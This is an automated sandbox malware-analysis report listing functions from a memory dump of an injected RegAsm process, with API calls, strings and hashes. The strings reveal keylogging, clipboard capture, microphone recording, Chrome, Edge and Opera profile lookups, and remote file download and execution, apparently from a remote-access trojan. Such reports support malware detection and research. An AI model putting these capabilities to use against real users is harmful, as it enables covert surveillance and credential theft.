                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                    • String ID:
                    • API String ID: 2633735394-0
                    • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                    • Instruction ID: dcee73c62e3621a690853eebe59cad03ae51e1002f288686f44977c5109bb855
                    • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                    • Instruction Fuzzy Hash: 18011732000109BBCF12AF55CC01EDA3BBAEF9D754F04511AFD5861221C3BAE861DBA5
                    Function 004193E3 Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: MetricsSystem
                    • String ID:
                    • API String ID: 4116985748-0
                    • Opcode ID: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                    • Instruction ID: 9a44d86f369c7068fc2c949f9b02ed5542bf43da40f6b7222f807aea32733f55
                    • Opcode Fuzzy Hash: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                    • Instruction Fuzzy Hash: DFF0A471B043155BD744EA759C51A6F6BD5EBD4264F10043FF20887281EE78DC468785
                    Function 00438F31 Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                    Download Yara Rule
                    APIs
                    • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438F31
                    • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438F36
                    • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438F3B
                      • Part of subcall function 0043A43A: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A44B
                    • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438F50
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                    • String ID:
                    • API String ID: 1761009282-0
                    • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                    • Instruction ID: 04dbcd9d80b8837b95b31ffc0e846904d80335f120ca5f78e3accc67d081205e
                    • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                    • Instruction Fuzzy Hash: 59C04C15080781541C50B6B2210B2AE83461E7E38DFD074DFFCE0571038E4E043B653F
                    Function 00442C5D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                    Download Yara Rule
                    APIs
                    • __startOneArgErrorHandling.LIBCMT ref: 00442CED
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorHandling__start
                    • String ID: pow
                    • API String ID: 3213639722-2276729525
                    • Opcode ID: ae0341c24035669086af68b363e9d44c4063f2ceb2f02d621ae22780893f867c
                    • Instruction ID: c2a334fe3ab53b67a82bc2a1da04863f7f1ed5e2a579c87dfbcc8ae8a095d349
                    • Opcode Fuzzy Hash: ae0341c24035669086af68b363e9d44c4063f2ceb2f02d621ae22780893f867c
                    • Instruction Fuzzy Hash: C6516DA1E0420296FB167B14CE4137B2BA4DB40751F704D7FF096823AAEB7D8C859A4F
                    Function 0040B748 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                    • __Init_thread_footer.LIBCMT ref: 0040B797
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: Init_thread_footer__onexit
                    • String ID: [End of clipboard]$[Text copied to clipboard]
                    • API String ID: 1881088180-3686566968
                    • Opcode ID: fb1c81892c2e036c5d6c31f086f493dd212476ae9b22afc1b3a562318c09d8ed
                    • Instruction ID: c7bebb0a0a15900a9cc4ffb6e17528162536323bfdf0e6139bd55c50ddf57f74
                    • Opcode Fuzzy Hash: fb1c81892c2e036c5d6c31f086f493dd212476ae9b22afc1b3a562318c09d8ed
                    • Instruction Fuzzy Hash: C0219F32A101054ACB14FB66D8829EDB379AF90318F10453FE505731E2EF386D4A8A9C
                    Function 00451B37 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00451D92,?,00000050,?,?,?,?,?), ref: 00451C12
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: ACP$OCP
                    • API String ID: 0-711371036
                    • Opcode ID: 9e0df5bdb224d2be14a0cd5949da06f0ee57b11af7c7271d7bdd2cdd18eeb32c
                    • Instruction ID: fc24b39bc158c677debbea649066bee6e1bba6d32f28379ebc1c8ba741b2d3ba
                    • Opcode Fuzzy Hash: 9e0df5bdb224d2be14a0cd5949da06f0ee57b11af7c7271d7bdd2cdd18eeb32c
                    • Instruction Fuzzy Hash: BA217D22A4010063DB34CF54C940B9B326ADF50B27F568166ED09C7322F73AED44C39C
                    Function 00449BF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                    Download Yara Rule
                    APIs
                    • GetStdHandle.KERNEL32(000000F6), ref: 00449C3C
                    • GetFileType.KERNEL32 ref: 00449C4E
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: FileHandleType
                    • String ID: O
                    • API String ID: 3000768030-2623078450
                    • Opcode ID: b34b3b4b83b21344277d15047b5fba51ecc245e821c78927fd7bd009bf1ff183
                    • Instruction ID: 67a772f1b96ce562b336c628e562ce1c63ba93f9b2d947f4b03656f810f331b8
                    • Opcode Fuzzy Hash: b34b3b4b83b21344277d15047b5fba51ecc245e821c78927fd7bd009bf1ff183
                    • Instruction Fuzzy Hash: E61160315047524AE7304E3E8CC86677AD5AB56335B380B2FD5B6876F1C638DC82AA49
                    Function 00404FF4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67timeCOMMON
                    Download Yara Rule
                    APIs
                    • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415CC9,?,00000001,0000004C,00000000), ref: 00405030
                      • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                    • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415CC9,?,00000001,0000004C,00000000), ref: 00405087
                    Strings
                    • KeepAlive | Enabled | Timeout: , xrefs: 0040501F
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: LocalTime
                    • String ID: KeepAlive | Enabled | Timeout:
                    • API String ID: 481472006-1507639952
                    • Opcode ID: 889eda472554f13da5ed19224a724834adbe5322b7fc00b68ad75e81c6f62207
                    • Instruction ID: 59903f388a44bacb81d563bcbf5ab321eb0051b597eccb46fab67989b44e7fd4
                    • Opcode Fuzzy Hash: 889eda472554f13da5ed19224a724834adbe5322b7fc00b68ad75e81c6f62207
                    • Instruction Fuzzy Hash: 1D21F2719046405BD710B7259C0676F7B64E751308F40087EE8491B2A6DA7D5A88CBEF
                    Function 0043C0F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free
                    • String ID: O
                    • API String ID: 269201875-2623078450
                    • Opcode ID: 02760b80b86df20b895d786181226116df47ae15e5a50630a9576685b8d3801b
                    • Instruction ID: 33e0fe0941749f3336bda6be3c0f63978f5ebcf9e4adac19a04b7d23778c801b
                    • Opcode Fuzzy Hash: 02760b80b86df20b895d786181226116df47ae15e5a50630a9576685b8d3801b
                    • Instruction Fuzzy Hash: A511D371A002104BEF209F39AC81B567294A714734F14162BF929EA2D5D6BCD8815F89
                    Function 0041663B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62sleepfilenetworkCOMMON
                    Download Yara Rule
                    APIs
                    • Sleep.KERNEL32 ref: 00416640
                    • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166A2
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: DownloadFileSleep
                    • String ID: !D@
                    • API String ID: 1931167962-604454484
                    • Opcode ID: 07a7ba679a22719b007f27f942da87136b12813d5d7402b4186b0f1ae2008f5d
                    • Instruction ID: f21b004d79e7af0ef9ad63e4b6518ad07bb10e0138b316cec4f8e9f86784bb19
                    • Opcode Fuzzy Hash: 07a7ba679a22719b007f27f942da87136b12813d5d7402b4186b0f1ae2008f5d
                    • Instruction Fuzzy Hash: C6115171A083029AC714FF72D8969BE77A8AF54348F400C3FF546621E2EE3C9949C65A
                    Function 0041B4EF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59timeCOMMON
                    Download Yara Rule
                    APIs
                    • GetLocalTime.KERNEL32(00000000), ref: 0041B509
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: LocalTime
                    • String ID: | $%02i:%02i:%02i:%03i
                    • API String ID: 481472006-2430845779
                    • Opcode ID: 0b58fb712609a629be2860926311a3a1d9782cd388fbf364b696734300abae58
                    • Instruction ID: b0c371a91d376d28eb23a1cf2c2b6b2589463c7c7bf84255da33bc44f247512a
                    • Opcode Fuzzy Hash: 0b58fb712609a629be2860926311a3a1d9782cd388fbf364b696734300abae58
                    • Instruction Fuzzy Hash: 361181714082055AC304EB62D8419BFB3E9AB44348F50093FF895A21E1EF3CDA49C65A
                    Function 0041AD17 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                    Download Yara Rule
                    APIs
                    • PathFileExistsW.SHLWAPI(00000000), ref: 0041AD3C
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExistsFilePath
                    • String ID: alarm.wav$hYG
                    • API String ID: 1174141254-2782910960
                    • Opcode ID: 0e1c4e1224622d2e2eba9349cd815abebc3d2b7a1c969d03ea25083f5c27e476
                    • Instruction ID: 1ebdaa4a32a078914063a8122a991a3a49773bb3edac1861de613ef54c78e1f6
                    • Opcode Fuzzy Hash: 0e1c4e1224622d2e2eba9349cd815abebc3d2b7a1c969d03ea25083f5c27e476
                    • Instruction Fuzzy Hash: 7A01F5B064460156C604F37698167EE37464B80319F00447FF68A266E2EFBC9D99C68F
                    Function 0040B051 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B172
                      • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                      • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                    • CloseHandle.KERNEL32(?), ref: 0040B0B4
                    • UnhookWindowsHookEx.USER32 ref: 0040B0C7
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                    • String ID: Online Keylogger Stopped
                    • API String ID: 1623830855-1496645233
                    • Opcode ID: e1143dfe4ebbdf49b26d73ef465cebd6e20b11e5a8ab35f70cc7b7b67a3e30d6
                    • Instruction ID: 2e372e3e3892c4e8816e9c8053feed756abc81e7e35a03d4dadb391bbfa0e77d
                    • Opcode Fuzzy Hash: e1143dfe4ebbdf49b26d73ef465cebd6e20b11e5a8ab35f70cc7b7b67a3e30d6
                    • Instruction Fuzzy Hash: 0101F5306002049BD7217B35C80B3BF7BA59B41305F40007FE642226D2EBB91845D7DE
                    Function 00449A5C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00445888: EnterCriticalSection.KERNEL32(-0006D41D,?,00442FDB,00000000,0046E928,0000000C,00442F96,?,?,?,00445B26,?,?,004482CA,00000001,00000364), ref: 00445897
                    • DeleteCriticalSection.KERNEL32(?,?,?,?,?,0046EB30,00000010,0043C1D5), ref: 00449ABE
                    • _free.LIBCMT ref: 00449ACC
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: CriticalSection$DeleteEnter_free
                    • String ID: O
                    • API String ID: 1836352639-2623078450
                    • Opcode ID: 54980ce14eb4704881cc4366b9e02da215daae199b46963b1b84cecc0170e34b
                    • Instruction ID: d8668749b8f053f3b87a5db4b07a71174a174bb0d30b2be9e7ca2d93a8738622
                    • Opcode Fuzzy Hash: 54980ce14eb4704881cc4366b9e02da215daae199b46963b1b84cecc0170e34b
                    • Instruction Fuzzy Hash: 491161315002149FE720DFA9D846B5D73B0FB04315F10455AE959AB2E6CBBCEC82DB0D
                    Function 004017EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                    Download Yara Rule
                    APIs
                    • waveInPrepareHeader.WINMM(?,00000020,?), ref: 00401849
                    • waveInAddBuffer.WINMM(?,00000020), ref: 0040185F
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: wave$BufferHeaderPrepare
                    • String ID: XMG
                    • API String ID: 2315374483-813777761
                    • Opcode ID: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
                    • Instruction ID: 6f1d19605e244f5f119b09d66236675289974365e05be472c2159163c6862827
                    • Opcode Fuzzy Hash: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
                    • Instruction Fuzzy Hash: D3016D71700301AFD7209F75EC48969BBA9FB89355701413AF409D3762EB759C90CBA8
                    Function 00448AE6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • IsValidLocale.KERNEL32(00000000,JD,00000000,00000001,?,?,00444AEA,?,?,004444CA,?,00000004), ref: 00448B32
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: LocaleValid
                    • String ID: IsValidLocaleName$JD
                    • API String ID: 1901932003-2234456777
                    • Opcode ID: 8ed56ec59b6d4db5e47e15cf77ebd157549768ac78bfa39ea2b76d2b56dc7c94
                    • Instruction ID: c43517d2c5aad0833927174c53c021eab8a1ac695cd7bc198788f3b2bcf9e263
                    • Opcode Fuzzy Hash: 8ed56ec59b6d4db5e47e15cf77ebd157549768ac78bfa39ea2b76d2b56dc7c94
                    • Instruction Fuzzy Hash: D6F05230A80308F7DB106B60DC06FAEBF58CB04B52F10017EFD046B291CE786E05929E
                    Function 0040C4C3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                    Download Yara Rule
                    APIs
                    • PathFileExistsW.SHLWAPI(00000000), ref: 0040C4F6
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExistsFilePath
                    • String ID: UserProfile$\AppData\Local\Google\Chrome\
                    • API String ID: 1174141254-4188645398
                    • Opcode ID: d11da1c58d5dd2ef9da09c3ea68de0927d50847f2cce6e72d2cc7c3e9ccd8b86
                    • Instruction ID: 529cceb54bdbac8586af3e6ebd5273a77adcdcd577382419881006e182ae29c8
                    • Opcode Fuzzy Hash: d11da1c58d5dd2ef9da09c3ea68de0927d50847f2cce6e72d2cc7c3e9ccd8b86
                    • Instruction Fuzzy Hash: 96F05E31A00219A6C604BBF69C478BF7B3C9D50709B50017FBA01B61D3EE789945C6EE
                    Function 0040C526 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                    Download Yara Rule
                    APIs
                    • PathFileExistsW.SHLWAPI(00000000), ref: 0040C559
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExistsFilePath
                    • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                    • API String ID: 1174141254-2800177040
                    • Opcode ID: 62d77e7710f88fd67431bbf20b3e0d601dfd53fd2a54c8c31c6ded84776c1d6f
                    • Instruction ID: 330371ab8f71d6844e3501a7b0875f3b866c8fe31c1dcac5d822fe972055fe7f
                    • Opcode Fuzzy Hash: 62d77e7710f88fd67431bbf20b3e0d601dfd53fd2a54c8c31c6ded84776c1d6f
                    • Instruction Fuzzy Hash: ECF05E31A00219A6CA14B7B69C47CEF7B6C9D50705B10017FB602B61D2EE78994186EE
                    Function 0040C589 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                    Download Yara Rule
                    APIs
                    • PathFileExistsW.SHLWAPI(00000000), ref: 0040C5BC
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExistsFilePath
                    • String ID: AppData$\Opera Software\Opera Stable\
                    • API String ID: 1174141254-1629609700
                    • Opcode ID: cbec4c721474318851a7c02d4d9936ce5133d15acec931d959add52bdfa17e90
                    • Instruction ID: 49b076bb86b4c8db4da1bdedad10e463925805c403c57d636a3174f469f12df7
                    • Opcode Fuzzy Hash: cbec4c721474318851a7c02d4d9936ce5133d15acec931d959add52bdfa17e90
                    • Instruction Fuzzy Hash: 13F05E31A00319A6CA14B7B69C47CEF7B7C9D10709B40017BB601B61D2EE789D4586EA
                    Function 004437E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free
                    • String ID: .P
                    • API String ID: 269201875-2220739652
                    • Opcode ID: 0ad43b1214ad8572508d9786c92e0b088e9d3dbafa2474dd36ac496255489d68
                    • Instruction ID: d76a88c3c7e0b504eff74fb84b9f6db8507cba8af1ea4ea387731c34734dfbbf
                    • Opcode Fuzzy Hash: 0ad43b1214ad8572508d9786c92e0b088e9d3dbafa2474dd36ac496255489d68
                    • Instruction Fuzzy Hash: AAE0E562A0182040F675BA3F2D05B9B49C5DB8173BF11433BF538861C1DFAC4A4251AE
                    Function 0040B646 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32keyboardCOMMON
                    Download Yara Rule
                    APIs
                    • GetKeyState.USER32(00000011), ref: 0040B64B
                      • Part of subcall function 0040A3E0: GetForegroundWindow.USER32 ref: 0040A416
                      • Part of subcall function 0040A3E0: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A422
                      • Part of subcall function 0040A3E0: GetKeyboardLayout.USER32 ref: 0040A429
                      • Part of subcall function 0040A3E0: GetKeyState.USER32(00000010), ref: 0040A433
                      • Part of subcall function 0040A3E0: GetKeyboardState.USER32(?), ref: 0040A43E
                      • Part of subcall function 0040A3E0: ToUnicodeEx.USER32 ref: 0040A461
                      • Part of subcall function 0040A3E0: ToUnicodeEx.USER32 ref: 0040A4C1
                      • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,?,0040B82F,?,?,?,?,?,00000000), ref: 0040A662
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                    • String ID: [AltL]$[AltR]
                    • API String ID: 2738857842-2658077756
                    • Opcode ID: 2b71d764483a078f53a432e7892b7890680e208db1d279d2457640738fc20bd0
                    • Instruction ID: e48b288e44f9d4c6b211653e2fe3bcc76c2b66b59b43e84e4aaf588e4500f4a3
                    • Opcode Fuzzy Hash: 2b71d764483a078f53a432e7892b7890680e208db1d279d2457640738fc20bd0
                    • Instruction Fuzzy Hash: 3BE0652134021052C828323E592F6BE2D51C742754B86057FF9826B6C5DABF4D1542CF
                    Function 0044ECEC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMON
                    Download Yara Rule
                    APIs
                    • GetOEMCP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED17
                    • GetACP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED2E
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: uD
                    • API String ID: 0-2547262877
                    • Opcode ID: c5b08800a69d4838b4f5beafbc063674321feb547ffb76a205f46ddd03b66443
                    • Instruction ID: 19c10458df6b4aed5d20bc802b22671fd2b069e30d3a1616a3713fc20edc201d
                    • Opcode Fuzzy Hash: c5b08800a69d4838b4f5beafbc063674321feb547ffb76a205f46ddd03b66443
                    • Instruction Fuzzy Hash: A5F0C871800105CBEB20DB55DC897697771BF11335F144755E4394A6E2C7B98C81CF49
                    Function 0041618A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON
                    Download Yara Rule
                    APIs
                    • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161A8
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExecuteShell
                    • String ID: !D@$open
                    • API String ID: 587946157-1586967515
                    • Opcode ID: ef1b3a0f4602e6d199ecf0e45d17a7acf077c1a045a33f1301243906c424f492
                    • Instruction ID: 73504a7432a82bf20c2cd712858cac99996ed9f8eaf32da6c0f13d1c3fa6c831
                    • Opcode Fuzzy Hash: ef1b3a0f4602e6d199ecf0e45d17a7acf077c1a045a33f1301243906c424f492
                    • Instruction Fuzzy Hash: 2FE0ED712483059AD614EA72DC91AFE7358AB54755F40083FF506514E2EE3C5849C65A
                    Function 0040B6A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24keyboardCOMMON
                    Download Yara Rule
                    APIs
                    • GetKeyState.USER32(00000012), ref: 0040B6A5
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: State
                    • String ID: [CtrlL]$[CtrlR]
                    • API String ID: 1649606143-2446555240
                    • Opcode ID: 74451c87ab4e18a563cce8b4b99f8aefb6389db58d63b1dc50ea5b4c36b24e36
                    • Instruction ID: bec5627f59812d2efb235ad4bfa8f6d19d2d97b3e0140e65676d9d4505e8418d
                    • Opcode Fuzzy Hash: 74451c87ab4e18a563cce8b4b99f8aefb6389db58d63b1dc50ea5b4c36b24e36
                    • Instruction Fuzzy Hash: 6FE04F2160021052C524363D5A1E67D2911CB52754B42096FF882A76CADEBF891543CF
                    Function 0043C1C8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00449A5C: DeleteCriticalSection.KERNEL32(?,?,?,?,?,0046EB30,00000010,0043C1D5), ref: 00449ABE
                      • Part of subcall function 00449A5C: _free.LIBCMT ref: 00449ACC
                      • Part of subcall function 00449AFC: _free.LIBCMT ref: 00449B1E
                    • DeleteCriticalSection.KERNEL32(004FE6C0), ref: 0043C1F1
                    • _free.LIBCMT ref: 0043C205
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$CriticalDeleteSection
                    • String ID: O
                    • API String ID: 1906768660-2623078450
                    • Opcode ID: e906819441e1cb781d28dd4a1ea52947b9d71dae153e88ad857ccbc322e7c3cc
                    • Instruction ID: 43a050214315618beeb9c81765b0605937ca417edd614e55d144c525631042cd
                    • Opcode Fuzzy Hash: e906819441e1cb781d28dd4a1ea52947b9d71dae153e88ad857ccbc322e7c3cc
                    • Instruction Fuzzy Hash: 69E04F329145108FEB717F6AFD8595A73E49B4D325B11082FFC0DA316ACA6DAC809B8D
                    Function 0040E79F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                    • __Init_thread_footer.LIBCMT ref: 00410F29
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: Init_thread_footer__onexit
                    • String ID: ,kG$0kG
                    • API String ID: 1881088180-2015055088
                    • Opcode ID: 3543072a86426642cb3d95922a277c4e502be0bac8cf48ffd361c80e3a631357
